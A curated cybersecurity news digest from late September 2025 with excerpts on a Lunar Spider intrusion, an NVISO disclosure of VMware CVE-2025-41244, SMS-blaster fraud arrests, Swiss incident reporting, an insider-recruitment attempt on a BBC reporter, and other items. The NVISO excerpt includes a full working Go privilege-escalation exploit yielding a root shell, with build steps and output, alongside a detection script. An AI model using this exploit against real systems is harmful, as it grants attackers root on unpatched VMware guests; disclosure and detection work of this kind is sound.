Cyberveille, curated by Decio
From a Single Click: How Lunar Spider Enabled a Near Two-Month Intrusion https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/
29/09/2025 23:03:58

The DFIR Report - thedfirreport.com/2025/09/29 September 29, 2025

Key Takeaways
The intrusion began with a Lunar Spider linked JavaScript file disguised as a tax form that downloaded and executed Brute Ratel via an MSI installer.
Multiple types of malware were deployed across the intrusion, including Latrodectus, Brute Ratel C4, Cobalt Strike, BackConnect, and a custom .NET backdoor.
Credentials were harvested from several sources like LSASS, backup software, and browsers, and also a Windows Answer file used for automated provisioning.
Twenty days into the intrusion data was exfiltrated using Rclone and FTP.
Threat actor activity persisted for nearly two months with intermittent command and control (C2) connections, discovery, lateral movement, and data exfiltration.
This case was featured in our September 2025 DFIR Labs Forensics Challenge and is available as a lab today here for one-time access or included in our new subscription plan. It was originally published as a Threat Brief to customers in Feb 2025.

Case Summary
The intrusion took place in May 2024, when a user executed a malicious JavaScript file. This JavaScript file has been previously reported as associated with the Lunar Spider initial access group by EclecticIQ. The heavily obfuscated file, masquerading as a legitimate tax form, contained only a small amount of executable code dispersed among extensive filler content used for evasion. The JavaScript payload triggered the download of an MSI package, which deployed a Brute Ratel DLL file using rundll32.

The Brute Ratel loader subsequently injected Latrodectus malware into the explorer.exe process, and established command and control communications with multiple CloudFlare-proxied domains. The Latrodectus payload was then observed retrieving a stealer module. Around one hour after initial access, the threat actor began reconnaissance activities using built-in Windows commands for host and domain enumeration, including ipconfig, systeminfo, nltest, and whoami commands.

Approximately six hours after initial access, the threat actor established a BackConnect session, and initiated VNC-based remote access capabilities. This allowed them to browse the file system and upload additional malware to the beachhead host.

On day three, the threat actor discovered and accessed an unattend.xml Windows Answer file containing plaintext domain administrator credentials left over from an automated deployment process. This provided the threat actor with immediate high-privilege access to the domain environment.

On day four, the threat actor expanded their activity by deploying Cobalt Strike beacons. They escalated privileges using Windows’ Secondary Logon service and the runas command to authenticate as the domain admin account found the prior day. The threat actor then conducted extensive Active Directory reconnaissance using AdFind. Around an hour after this discovery activity they began lateral movement. They used PsExec to remotely deploy Cobalt Strike DLL beacons to several remote hosts including a domain controller as well as file and backup servers.

They then paused for around five hours. On their return, they deployed a custom .NET backdoor that created a scheduled task for persistence and set up an additional command and control channel. They also dropped another Cobalt Strike beacon that had a new command and control server. They then used a custom tool exploiting the Zerologon (CVE-2020-1472) vulnerability to attempt additional lateral movement to a second domain controller. After that they tried to execute Metasploit laterally to that domain controller via a remote service; however, they were unable to establish a command and control channel from this action.

On day five, the threat actor returned using RDP to access a new server that they then dropped the newest Cobalt Strike beacon on. This was then followed by an RDP logon to a file share server where they also deployed Cobalt Strike. Around 12 hours after that they returned to the beachhead host and replaced the BruteRatel file used for persistence with a new BruteRatel badger DLL. After this there was a large gap before their next actions.

Fifteen days later, the 20th since initial access, the threat actor became active again. They deployed a set of scripts to execute a renamed rclone binary to exfiltrate the data from the file share server. This exfiltration used FTP to send data over a roughly 10 hour period to the threat actor’s remote host. After this concluded there was another pause in threat actor actions.

On the 26th day of the intrusion the threat actor returned to the backup server and used a PowerShell script to dump credentials from the backup server software. Two days later they appeared again on the backup server and dropped a network scanning tool, rustscan, which they used to scan subnets across the environment. After this, hands-on activity ceased again.

The threat actor maintained intermittent command and control access for nearly two months following initial compromise, leveraging BackConnect VNC capabilities and multiple payloads, including Latrodectus, Brute Ratel, and Cobalt Strike, before being evicted from the environment. Despite the extended dwell time and comprehensive access to critical infrastructure, no ransomware deployment was observed during this intrusion.

thedfirreport.com EN 2025 DFIR Lunar Spider bruteratel cobaltstrike latrodectus incident
You name it, VMware elevates it (CVE-2025-41244) https://blog.nviso.eu/2025/09/29/you-name-it-vmware-elevates-it-cve-2025-41244/
29/09/2025 20:36:02

blog.nviso.eu Maxime Thiebaut Incident Response & Threat Researcher Expert within NVISO CSIRT 29.09.2025

NVISO has identified zero-day exploitation of CVE-2025-41244, a local privilege escalation vulnerability impacting VMware's guest service discovery features.

On September 29th, 2025, Broadcom disclosed a local privilege escalation vulnerability, CVE-2025-41244, impacting VMware’s guest service discovery features. NVISO has identified zero-day exploitation in the wild beginning mid-October 2024.

The vulnerability impacts both the VMware Tools and VMware Aria Operations. When successful, exploitation of the local privilege escalation results in unprivileged users achieving code execution in privileged contexts (e.g., root).

Throughout its incident response engagements, NVISO determined with confidence that UNC5174 triggered the local privilege escalation. We can however not assess whether this exploit was part of UNC5174’s capabilities or whether the zero-day’s usage was merely accidental due to its trivialness. UNC5174, a Chinese state-sponsored threat actor, has repeatedly been linked to initial access operations achieved through public exploitation.

Background
Organizations relying on the VMware hypervisor commonly employ the VMware Aria Suite to manage their hybrid‑cloud workloads from a single console. Within this VMware Aria Suite, VMware Aria Operations is the component that provides performance insights, automated remediation, and capacity planning for the different hybrid‑cloud workloads. As part of its performance insights, VMware Aria Operations is capable of discovering which services and applications are running in the different virtual machines (VMs), a feature offered through the Service Discovery Management Pack (SDMP).

The discovery of these services and applications can be achieved in either of two modes:

The legacy credential-based service discovery relies on VMware Aria Operations running metrics collector scripts within the guest VM using a privileged user. In this mode, all the collection logic is managed by VMware Aria Operations and the guest’s VMware Tools merely acts as a proxy for the performed operations.
The credential-less service discovery is a more recent approach where the metrics collection has been implemented within the guest’s VMware Tools itself. In this mode, no credentials are needed as the collection is performed under the already privileged VMware Tools context.
As part of its discovery, NVISO was able to confirm the privilege escalation affects both modes, with the logic flaw hence being respectively located within VMware Aria Operations (in credential-based mode) and the VMware Tools (in credential-less mode). While VMware Aria Operations is proprietary, the VMware Tools are available as an open-source variant known as VMware’s open-vm-tools, distributed on most major Linux distributions. The following CVE-2025-41244 analysis is performed on this open-source component.

Analysis
Within open-vm-tools’ service discovery feature, the component handling the identification of a service’s version is achieved through the get-versions.sh shell script. As part of its logic, the get-versions.sh shell script has a generic get_version function. The function takes as argument a regular expression pattern, used to match supported service binaries (e.g., /usr/bin/apache), and a version command (e.g., -v), used to indicate how a matching binary should be invoked to retrieve its version.

When invoked, get_version loops over $space_separated_pids, a list of all processes with a listening socket. For each process, it checks whether the service binary (e.g., /usr/bin/apache) matches the regular expression and, if so, invokes the supported service’s version command (e.g., /usr/bin/apache -v).

get_version() {
    PATTERN=$1
    VERSION_OPTION=$2
    for p in $space_separated_pids
    do
        COMMAND=$(get_command_line $p | grep -Eo "$PATTERN")
        [ ! -z "$COMMAND" ] && echo VERSIONSTART "$p" "$("${COMMAND%%[[:space:]]*}" $VERSION_OPTION 2>&1)" VERSIONEND
    done
}
The get_version function is called using several supported patterns and associated version commands. While this functionality works as expected for system binaries (e.g., /usr/bin/httpd), the usage of the broad‑matching \S character class (matching non‑whitespace characters) in several of the regex patterns also matches non-system binaries (e.g., /tmp/httpd). These non-system binaries are located within directories (e.g., /tmp) which are writable to unprivileged users by design.

get_version "/\S+/(httpd-prefork|httpd|httpd2-prefork)($|\s)" -v
get_version "/usr/(bin|sbin)/apache\S" -v
get_version "/\S+/mysqld($|\s)" -V
get_version ".?/\S*nginx($|\s)" -v
get_version "/\S+/srm/bin/vmware-dr($|\s)" --version
get_version "/\S+/dataserver($|\s)" -v
By matching and subsequently executing non-system binaries (CWE-426: Untrusted Search Path), the service discovery feature can be abused by unprivileged users through the staging of malicious binaries (e.g., /tmp/httpd) which are subsequently elevated for version discovery. As simple as it sounds, you name it, VMware elevates it.

Proof of Concept
To abuse this vulnerability, an unprivileged local attacker can stage a malicious binary within any of the broadly-matched regular expression paths. A simple common location, abused in the wild by UNC5174, is /tmp/httpd. To ensure the malicious binary is picked up by the VMware service discovery, the binary must be run by the unprivileged user (i.e., show up in the process tree) and open at least a (random) listening socket.

The following bare-bone CVE-2025-41244.go proof-of-concept can be used to demonstrate the privilege escalation.

package main

import (
    "fmt"
    "io"
    "net"
    "os"
    "os/exec"
)

func main() {
    // If started with an argument (e.g., -v or --version), assume we're the privileged process.
    // Otherwise, assume we're the unprivileged process.
    if len(os.Args) >= 2 {
        if err := connect(); err != nil {
            panic(err)
        }
    } else {
        if err := serve(); err != nil {
            panic(err)
        }
    }
}

func serve() error {
    // Open a dummy listener, ensuring the service can be discovered.
    dummy, err := net.Listen("tcp", "127.0.0.1:0")
    if err != nil {
        return err
    }
    defer dummy.Close()

    // Open a listener to exchange stdin, stdout and stderr streams.
    l, err := net.Listen("unix", "@cve")
    if err != nil {
        return err
    }
    defer l.Close()

    // Loop privilege escalations, but don't do concurrency.
    for {
        if err := handle(l); err != nil {
            return err
        }
    }
}

func handle(l net.Listener) error {
    // Wait for the privileged stdin, stdout and stderr streams.
    fmt.Println("Waiting on privileged process...")

    stdin, err := l.Accept()
    if err != nil {
        return err
    }
    defer stdin.Close()

    stdout, err := l.Accept()
    if err != nil {
        return err
    }
    defer stdout.Close()

    stderr, err := l.Accept()
    if err != nil {
        return err
    }
    defer stderr.Close()

    // Interconnect stdin, stdout and stderr.
    fmt.Println("Connected to privileged process!")
    errs := make(chan error, 3)

    go func() {
        _, err := io.Copy(os.Stdout, stdout)
        errs <- err
    }()
    go func() {
        _, err := io.Copy(os.Stderr, stderr)
        errs <- err
    }()
    go func() {
        _, err := io.Copy(stdin, os.Stdin)
        errs <- err
    }()

    // Abort as soon as any of the interconnected streams fails.
    _ = <-errs
    return nil
}

func connect() error {
    // Define the privileged shell to execute.
    cmd := exec.Command("/bin/sh", "-i")

    // Connect to the unprivileged process.
    stdin, err := net.Dial("unix", "@cve")
    if err != nil {
        return err
    }
    defer stdin.Close()

    stdout, err := net.Dial("unix", "@cve")
    if err != nil {
        return err
    }
    defer stdout.Close()

    stderr, err := net.Dial("unix", "@cve")
    if err != nil {
        return err
    }
    defer stderr.Close()

    // Interconnect stdin, stdout and stderr.
    fmt.Fprintln(stdout, "Starting privileged shell...")
    cmd.Stdin = stdin
    cmd.Stdout = stdout
    cmd.Stderr = stderr

    return cmd.Run()
}
Once compiled to a matching path (e.g., go build -o /tmp/httpd CVE-2025-41244.go) and executed, the above proof of concept will spawn an elevated root shell as soon as the VMware metrics collection is executed. This process, at least in credential-less mode, has historically been documented to run every 5 minutes.

nobody@nviso:/tmp$ id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
nobody@nviso:/tmp$ /tmp/httpd
Waiting on privileged process...
Connected to privileged process!
Starting privileged shell...
/bin/sh: 0: can't access tty; job control turned off

id

uid=0(root) gid=0(root) groups=0(root)
#
Credential-based Service Discovery
When service discovery operates in the legacy credential-based mode, VMware Aria Operations will eventually trigger the privilege escalation once it runs the metrics collector scripts. Following successful exploitation, the unprivileged user will have achieved code execution within the privileged context of the configured credentials. The process tree below was obtained by running the ps -ef --forest command through the privilege escalation shell; the entries up to line 4 are legitimate and the entries from line 5 onward are part of the proof-of-concept exploit.

UID        PID  PPID  C STIME TTY          TIME CMD
root       806     1  0 08:54 ?        00:00:21 /usr/bin/vmtoolsd
root     80617   806  0 13:20 ?        00:00:00  \_ /usr/bin/vmtoolsd
root     80618 80617  0 13:20 ?        00:00:00      \_ /bin/sh /tmp/VMware-SDMP-Scripts-193-fb2553a0-d63c-44e5-90b3-e1cda71ae24c/script_-28702555433556123420.sh
root     80621 80618  0 13:20 ?        00:00:00          \_ /tmp/httpd -v
root     80626 80621  0 13:20 ?        00:00:00              \_ /bin/sh -i
root     81087 80626 50 13:22 ?        00:00:00                  \_ ps -ef --forest
Credential-less Service Discovery
When service discovery operates in the modern credential-less mode, the VMware Tools will eventually trigger the privilege escalation once it runs the collector plugin. Following successful exploitation, the unprivileged user will have achieved code execution within the privileged VMware Tools user context. The process tree below was obtained by running the ps -ef --forest command through the privilege escalation shell; the first entry is legitimate and all subsequent entries (line 3 and beyond) are part of the proof-of-concept exploit.

UID        PID  PPID  C STIME TTY          TIME CMD
root     10660     1  0 13:42 ?        00:00:00 /bin/sh /usr/lib/x86_64-linux-gnu/open-vm-tools/serviceDiscovery/scripts/get-versions.sh
root     10688 10660  0 13:42 ?        00:00:00  \_ /tmp/httpd -v
root     10693 10688  0 13:42 ?        00:00:00      \_ /bin/sh -i
root     11038 10693  0 13:44 ?        00:00:00          \_ ps -ef --forest
Detection
Successful exploitation of CVE-2025-41244 can easily be detected through the monitoring of uncommon child processes as demonstrated in the above process trees. Being a local privilege escalation, abuse of CVE-2025-41244 is indicative that an adversary has already gained access to the affected device and that several other detection mechanisms should have triggered.

Under certain circumstances, exploitation may forensically be confirmed in legacy credential-based mode through the analysis of lingering metrics collector scripts and outputs under the /tmp/VMware-SDMP-Scripts-{UUID}/ folders. While less than ideal, this approach may serve as a last resort in environments without process monitoring on compromised machines. The following redacted metrics collector script was recovered from the /tmp/VMware-SDMP-Scripts-{UUID}/script_-{ID}_0.sh location and mentions the matched non-system service binary on its last line.

#!/bin/sh

if [ -f "/tmp/VMware-SDMP-Scripts-{UUID}/script_-{ID}_0.stdout" ]
then
  rm -f "/tmp/VMware-SDMP-Scripts-{UUID}/script_-{ID}_0.stdout"
fi
if [ -f "/tmp/VMware-SDMP-Scripts-{UUID}/script_-{ID}_0.stderr" ]
then
  rm -f "/tmp/VMware-SDMP-Scripts-{UUID}/script_-{ID}_0.stderr"
fi
unset LINES;
unset COLUMNS;
/tmp/httpd -v >"/tmp/VMware-SDMP-Scripts-{UUID}/script_-{ID}_0.stdout" 2>"/tmp/VMware-SDMP-Scripts-{UUID}/script_-{ID}_0.stderr"

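The two detection approaches described in this section (flagging version probes that the VMware collectors ran on a binary outside a system directory, and reading the probed binary out of a lingering SDMP collector script), as an added Python example that is not NVISO's code or part of the original post. It takes ps -ef --forest output as input; the sample tree and script are constructed here, modelled on those above, and the list of trusted system directories is an assumption to tune per environment.

```python
import re
from dataclasses import dataclass

# Directories where legitimately discovered services live (assumption, tune per environment);
# anything else matched by the \S+ patterns (e.g. /tmp, /dev/shm, /home) is user-writable.
SYSTEM_DIRS = ("/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/", "/bin/", "/sbin/", "/opt/")

# The two collectors named in the article: get-versions.sh (credential-less mode) and the
# per-run /tmp/VMware-SDMP-Scripts-<UUID>/script_*.sh wrappers (credential-based mode).
COLLECTOR_RE = re.compile(
    r"open-vm-tools/serviceDiscovery/scripts/get-versions\.sh"
    r"|/tmp/VMware-SDMP-Scripts-[^/\s]+/script\S*\.sh"
)
VERSION_ARGS = {"-v", "-V", "--version"}


@dataclass
class Proc:
    pid: int
    ppid: int
    uid: str
    cmd: str


def parse_ps_forest(text):
    """Parse `ps -ef --forest` output into Proc records, dropping the tree glyphs."""
    procs = []
    for line in text.strip().splitlines()[1:]:  # first line is the column header
        uid, pid, ppid, _c, _stime, _tty, _time, cmd = line.split(None, 7)
        cmd = re.sub(r"^[\\_| ]+", "", cmd)  # strip the leading " \_ " forest glyphs
        procs.append(Proc(int(pid), int(ppid), uid, cmd))
    return procs


def is_system_path(path):
    return path.startswith(SYSTEM_DIRS)


def find_suspicious_probes(procs):
    """Version probes (<path> -v/-V/--version) that a collector ran on a non-system binary."""
    by_pid = {p.pid: p for p in procs}
    hits = []
    for p in procs:
        argv = p.cmd.split()
        parent = by_pid.get(p.ppid)
        if (len(argv) == 2 and argv[1] in VERSION_ARGS and argv[0].startswith("/")
                and not is_system_path(argv[0])
                and parent is not None and COLLECTOR_RE.search(parent.cmd)):
            hits.append(p)
    return hits


def subtree(procs, root_pid):
    """PIDs of root_pid and all its descendants, depth-first, for scoping the incident."""
    children = {}
    for p in procs:
        children.setdefault(p.ppid, []).append(p.pid)
    out, stack = [], [root_pid]
    while stack:
        pid = stack.pop()
        out.append(pid)
        stack.extend(reversed(children.get(pid, [])))
    return out


def triage(ps_text):
    """One finding per elevated probe: the command, the uid it ran as, and everything under it."""
    procs = parse_ps_forest(ps_text)
    return [{"probe": hit.cmd, "uid": hit.uid, "pids": subtree(procs, hit.pid)}
            for hit in find_suspicious_probes(procs)]


def probed_binary_from_sdmp_script(script_text):
    """Binary invoked by the last version-probe line of a recovered SDMP collector script."""
    for line in reversed(script_text.strip().splitlines()):
        m = re.match(r"(/\S+)\s+(-v|-V|--version)(\s|$)", line.strip())
        if m:
            return m.group(1)
    return None


# Constructed sample, modelled on the credential-less tree above: one benign probe of
# /usr/sbin/apache2 next to the elevated /tmp/httpd probe and the shell it spawned.
PS_FOREST = """\
UID        PID  PPID  C STIME TTY          TIME CMD
root     10660     1  0 13:42 ?        00:00:00 /bin/sh /usr/lib/x86_64-linux-gnu/open-vm-tools/serviceDiscovery/scripts/get-versions.sh
root     10670 10660  0 13:42 ?        00:00:00  \\_ /usr/sbin/apache2 -v
root     10688 10660  0 13:42 ?        00:00:00  \\_ /tmp/httpd -v
root     10693 10688  0 13:42 ?        00:00:00      \\_ /bin/sh -i
root     11038 10693  0 13:44 ?        00:00:00          \\_ ps -ef --forest
"""

# Constructed sample of a lingering credential-based collector script ({UUID}/{ID} placeholders).
SDMP_SCRIPT = """\
#!/bin/sh
unset LINES;
unset COLUMNS;
/tmp/httpd -v >"/tmp/VMware-SDMP-Scripts-{UUID}/script_-{ID}_0.stdout" 2>"/tmp/VMware-SDMP-Scripts-{UUID}/script_-{ID}_0.stderr"
"""

if __name__ == "__main__":
    for finding in triage(PS_FOREST):
        print(f"elevated probe {finding['probe']!r} as {finding['uid']}, pids {finding['pids']}")
    binary = probed_binary_from_sdmp_script(SDMP_SCRIPT)
    print(f"SDMP script probed {binary}: {'NON-SYSTEM' if not is_system_path(binary) else 'system'}")
```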
Conclusions
While NVISO identified these vulnerabilities through its UNC5174 incident response engagements, the vulnerabilities’ trivialness and the adversary practice of mimicking system binaries (T1036.005) do not allow us to determine with confidence whether UNC5174 willfully achieved exploitation.

The broad practice of mimicking system binaries (e.g., httpd) highlights the real possibility that several other malware strains have accidentally been benefiting from unintended privilege escalations for years. Furthermore, the ease with which these vulnerabilities could be identified in the open-vm-tools source code makes it unlikely that knowledge of the privilege escalations did not predate NVISO’s in-the-wild identification.

Timeline
2025-05-19: Forensic artifact anomaly noted during UNC5174 incident response engagement.
2025-05-21: Forensic artifact anomaly attributed to unknown zero-day vulnerability.
2025-05-25: Zero day vulnerability identified and reproduced in a lab environment.
2025-05-27: Responsible disclosure authorized and initiated through Broadcom.
2025-05-28: Responsible disclosure triaged, investigation started by Broadcom.
2025-06-18: Embargo extended by Broadcom until no later than October to align release cycles.
2025-09-29: Embargo lifted, CVE-2025-41244 patches and advisory published.

blog.nviso.eu EN 2025 CVE-2025-41244 PoC vulnerability VMware zero-day exploitation
Geneva: three individuals arrested for fake-fine scams - lematin.ch https://www.lematin.ch/story/geneve-trois-individus-arretes-pour-des-arnaques-aux-fausses-amendes-103422020
29/09/2025 16:59:30

Three men were arrested for using fraudulent SMS messages to defraud victims.

The Geneva public prosecutor's office announced on Thursday the arrest of three people accused of fake-fine scams. Two of them are 21 years old, the third is 30. One was arrested on 23 July, the other two more recently, on 5 and 7 September.

Two were arrested in vehicles containing "SMS blasters"; the third individual is the owner of one of the vehicles.

SMS blasters? These devices impersonate the mobile operators' base stations in order to collect phone numbers and send SMS messages containing a link to fraudulent sites.

Example given by the prosecutor's office: "parkings-ge.com", which imitates the official site of the Geneva parking foundation.

Fake bank adviser
"Recipients of the SMS messages were invited to pay a fake fine and to provide their personal and banking details for that purpose," the statement explains. "In a second step, the victims were contacted by a fake bank adviser, who urged them to hand over the codes needed to make withdrawals from their bank account."

The three arrested individuals are being prosecuted for fraud and misuse of a telecommunications installation.

For more information, the Geneva police recently detailed fake-ticket and fake-fine scams, together with the usual recommendations. The main ones are not to disclose personal data and to verify the legitimacy of the other party for any financial or urgent request.

lematin.ch FR CH 2025 Suisse Genève SMS-Blaster arrêtés
Six months of mandatory reporting of cyberattacks against critical infrastructure https://www.news.admin.ch/fr/newnsb/gezctyF6KYR7UkCjXBC5s
29/09/2025 11:48:07

news.admin.ch Berne, 29.09.2025

The legal obligation to report cyberattacks against critical infrastructure came into force on 1 April 2025. The Federal Office for Cybersecurity (OFCS) draws a positive balance after the first six months. So far, a total of 164 cyberattacks against critical infrastructure have been reported. The penalties for failure to report come into force on 1 October 2025.

The obligation to report cyberattacks against critical infrastructure came into force six months ago. The OFCS is broadly satisfied with how the measure has been implemented. Operators of critical infrastructure are respecting the legal deadline, which requires cyberattacks to be reported within 24 hours. The use of the Cyber Security Hub, which considerably simplifies the OFCS's handling of cyberattacks, is particularly positive. Even before the reporting obligation was introduced, the OFCS had a close relationship of trust with many critical infrastructure operators. This long-standing collaboration between partners formed the basis for the successful launch of the reporting obligation.

164 reports concerning critical infrastructure
Since the beginning of April, a total of 164 reports of cyberattacks against critical infrastructure have been submitted to the OFCS. The most frequent concern DDoS attacks (18.1%), followed by hacking (16.1%), ransomware attacks (12.4%), credential theft (11.4%), data leaks (9.8%) and malware (9.3%). Combined phenomena, such as ransomware attacks with simultaneous data leaks, were described in several cases. The affected sectors are varied. So far, the most heavily affected sector has been finance (19%), followed by IT (8.7%) and energy (7.6%). Other reports came from public authorities, the health sector, telecommunications companies, the postal sector, the transport sector, the media and technology sectors, and the food sector.

Strengthening information sharing
Reports are recorded and analysed for statistical purposes. The information obtained not only helps to respond concretely to an incident, but also contributes to a better assessment of threats at the national level and to warning other potentially affected organizations early enough. Since the reporting obligation came into force, many more organizations take part directly in information sharing. As a result, reports and recommendations reach significantly more actors through this channel.

Penalties from 1 October 2025 for violations
The penalties provided for by the Information Security Act for failure to report a cyberattack come into force on 1 October 2025. Critical infrastructure operators can be fined up to 100,000 francs if they do not comply with this obligation. Moreover, if the OFCS has indications that a report has not been made, it is required to first contact the authority concerned. Only if those concerned do not respond to this contact and to the subsequent ruling can the OFCS file a criminal complaint.

news.admin.ch FR 2025 OFCS cyberattaques obbligation infrastructures
'You'll never need to work again': Criminals offer reporter money to hack BBC https://www.bbc.com/news/articles/c3w5n903447o
29/09/2025 11:11:04

Reporter Joe Tidy was offered money if he would help cyber criminals access BBC systems.

Like many things in the shadowy world of cyber-crime, an insider threat is something very few people have experience of.

Even fewer people want to talk about it.

But I was given a unique and worrying experience of how hackers can leverage insiders when I myself was recently propositioned by a criminal gang.

"If you are interested, we can offer you 15% of any ransom payment if you give us access to your PC."

That was the message I received out of the blue from someone called Syndicate who pinged me in July on the encrypted chat app Signal.

I had no idea who this person was but instantly knew what it was about.

I was being offered a portion of a potentially large amount of money if I helped cyber criminals access BBC systems through my laptop.

They would steal data or install malicious software and hold my employer to ransom and I would secretly get a cut.

I had heard stories about this kind of thing.

In fact, only a few days before the unsolicited message, news emerged from Brazil that an IT worker there had been arrested for selling his login details to hackers which police say led to the loss of $100m (£74m) for the banking victim.

I decided to play along with Syndicate after taking advice from a senior BBC editor. I was eager to see how criminals make these shady deals with potentially treacherous employees at a time when cyber-attacks around the world are becoming more impactful and disruptive to everyday life.

I told Syn, who had changed their name mid-conversation, that I was potentially interested but needed to know how it works.

They explained that if I gave them my login details and security code then they would hack the BBC and then extort the corporation for a ransom in bitcoin. I would be in line for a portion of that payout.

They upped their offer.

"We aren't sure how much the BBC pays you but what if you took 25% of the final negotiation as we extract 1% of the BBC's total revenue? You wouldn't need to work ever again."

Syn estimated that their team could demand a ransom in the tens of millions if they successfully infiltrated the corporation.

The BBC has not publicly taken a position on whether or not it would pay hackers but advice from the National Crime Agency is not to pay.

Still, the hackers continued their pitch.

bbc.com EN 2025 bbc Criminals ransom offer reporter
Record fraud crackdown saves half a billion for public services https://www.gov.uk/government/news/record-fraud-crackdown-saves-half-a-billion-for-public-services
26/09/2025 15:16:30
GOV.UK. From: Cabinet Office, Public Sector Fraud Authority and Josh Simons MP. Published 24 September 2025

Government stops over £480 million ending up in the pockets of fraudsters over twelve months since April 2024 - more money than ever before.

  • New technology and artificial intelligence turns the tide in the fight against public sector fraud, with new tech to prevent a repeat of Covid loan fraud.
  • Over a third of the money saved relates to fraud committed by companies and people during the pandemic.
  • The crackdown means more funding for schools, hospitals and vital public services to deliver the Plan for Change.

Fraudsters have been stopped from stealing a record £480 million from the taxpayer in the government’s biggest ever fraud crackdown, meaning more money can be used to recruit nurses, teachers and police officers as part of the Plan for Change.

Over a third of the money saved (£186 million) comes from identifying and recovering fraud committed during the Covid-19 pandemic. Government efforts to date have blocked hundreds of thousands of companies with outstanding or potentially fraudulent Bounce Back Loans from dissolving before they would have to pay anything back. We have also clawed back millions of pounds from companies that took out Covid loans they were not entitled to, or took out multiple loans when only entitled to one.

This builds on successful convictions in recent months to crack down on opportunists who exploited the Bounce Back Loan Scheme for their own gain, including a woman who invented a company and then sent the loan money to Poland.

Alongside Covid fraud, the record savings reached in the year to April 2025 include clamping down on people unlawfully claiming single persons council tax discount and removing people from social housing waitlists who wanted to illegally sublet their discounted homes at the taxpayers’ expense.

Announcing the record figures at an anti-fraud Five Eyes summit in London, Cabinet Office Minister Josh Simons said:

Working people expect their taxes to go towards schools, hospitals, roads and the services they and their families use. That money going into the hands of fraudsters is a betrayal of their hard work and the system of paying your fair share. It has to stop.

That’s why this government has delivered the toughest ever crackdown on fraud, protecting almost half a billion pounds in under 12 months.

We’re using cutting-edge AI and data tools to stay one step ahead of fraudsters, making sure public funds are protected and used to deliver public services for those who need them most - not line the pockets of scammers and swindlers.

The savings have been driven by comparing different information the government holds to stop people falsely claiming benefits and discounts that they’re clearly not eligible for.

The high-tech push brought around £110m back to the exchequer more than the year before, and comes as the government pushes to save £45 billion by using tech to make the public sector more productive, saving money for the NHS and police forces to deliver the Plan for Change.

The Minister will also unveil a new AI fraud prevention tool that has been built by the government and will be used across all departments after successful tests.

The AI system scans new policies and procedures for weaknesses before they can be exploited, helping make new policies fraud-proof when they are drafting them. The tool could be essential in stopping fraudsters from taking advantage of government efforts to help people in need amid future emergencies.

It has been designed to prevent the scale of criminality seen through the Covid pandemic, where millions were lost to people falsely taking advantage of furlough, Covid Grants and Bounce Back Loans.

Results from early tests show it could save thousands of hours and help prevent millions in potential losses, slashing the time to identify fraud risks by 80% while preserving human oversight.

The UK will also licence the technology internationally, with Five Eyes partners at the summit considering adoption as part of strengthening global efforts to stop fraud and demonstrating Britain’s role at the forefront of innovation.

The summit will bring together key allies and showcase the government’s unprecedented use of artificial intelligence, data-matching and specialist investigators to target fraud across more than a thousand different schemes.

At the summit, Cabinet Office Minister Josh Simons will describe how the record crackdown has been achieved:

Over £68 million of wrongful pension payments were prevented across major public sector pension schemes, including the Local Government Pension Scheme, NHS Pension Scheme, Civil Service Pensions and Armed Forces pension schemes. These savings were achieved by identifying cases where pension payments continued after the individual had died, often with relatives continuing to claim benefits they were not entitled to.
More than 2,600 people were removed from housing waiting lists they weren’t entitled to be on, including individuals who were subletting or had multiple tenancies unlawfully.
Over 37,000 fraudulent single-person council tax discount claims were stopped, saving £36 million for local councils and taxpayers. These false claims, often made by individuals misrepresenting their household size to secure a 25% discount, were uncovered using advanced data-matching.
Today’s announcement follows extensive progress on fraud in the last 12 months, including the appointment of a Covid Counter-Fraud Commissioner, the introduction of the Public Authorities Fraud, Error and Recovery Bill, and a boost to AI-driven detection, saving hundreds of millions and strengthening public sector fraud prevention – driven by the Public Sector Fraud Authority.

The majority of the £480 million saved is taxpayer money, with a portion from private sector partners, such as insurance and utilities companies, helping lower consumer costs and support UK business growth.

gov.uk EN 2025 recover AI fraud UK
ANTS denies the theft of 12 million records: where the affair stands https://www.lesnumeriques.com/societe-numerique/l-ants-dement-le-piratage-de-12-millions-de-donnees-on-fait-le-point-sur-l-affaire-n242725.html
26/09/2025 15:13:02

Les Numériques, by Juliette Sbranna. Published 22/09/25 at 19:45

A file allegedly stolen from ANTS is said to be circulating on the dark web. Between rumours, dubious samples and repeated listings, here is where the affair stands and what has actually been confirmed.

ANTS is said to have had 12 million records stolen, but the rumour appears to be false

Since this weekend, rumours of a data theft at ANTS have been circulating. But the affair took an unexpected turn when the agency finally denied these rumours, while leaving the door open to the possibility that some information was lost. Here is an overview of the situation.

As a reminder, the Agence Nationale des Titres Sécurisés, now France Titres, is the public body created by the State that manufactures and issues official documents such as identity cards, passports and driving licences. When an application is made at a town hall or online, it is this agency that centralises the request and produces the document, which would make a leak a real problem.

No theft from ANTS, reportedly
There was said to be around 12 million ANTS records circulating on the dark web, plus a freely accessible sample, all allegedly stolen. However, the affair took a particular turn when the agency denied these rumours.

According to ANTS, no intrusion has been detected so far. The agency, which reports to the Ministry of the Interior and handles sensitive data, points out that it is subject to strict security measures and constant monitoring by state services.

No intrusion has been identified within the information systems of ANTS, either by the agency's own services or by those of the Ministry of the Interior.

The sample available on the dark web contains numerous inconsistencies

As for this famous freely accessible sample, this is where the affair becomes interesting, because the outlet ZATAZ discovered that this file, allegedly from ANTS, had already been on sale for months.

The same file of more than 10 million civil status records managed by ANTS was exfiltrated in March 2025 via a compromised access point and has circulated on the dark web several times, with listings spotted in June and re-posted in mid-September 2025. The sellers' pseudonyms and the platforms change, but it would appear to be the same leak.

However, here too ANTS reassures its users, as this data is said not to match the agency's formats and to contain far too many inconsistencies to be genuine.

The sample available on the dark web, presented as a "loss leader", contains numerous inconsistencies and formats that do not match those of ANTS.

A hacker using an already-known method?
However, even with false information, the hacker could still come out ahead: the pattern is simple, he posts, influencers relay, and internet users amplify, increasing the visibility and commercial value of the listings. In short, a scammer fleecing other scammers by selling misleading data.

For now, the affair is ongoing, but ANTS has filed a complaint against persons unknown and will pursue the case in court. The Agence Nationale de la Sécurité des Systèmes d'Information (ANSSI) has also been mobilised to identify the origin of this data and those responsible for its distribution.

In the end, while ANTS is reassuring about the absence of any intrusion into its systems, the possible circulation of some data remains something to monitor.

lesnumeriques.com FR 2025 ANTS France Agence ANSSI
Netherlands: Two teenagers arrested in spying case linked to Russia https://www.bbc.com/news/articles/cgj1wy3eexyo
26/09/2025 14:37:43

bbc.com, Jacqueline Howard

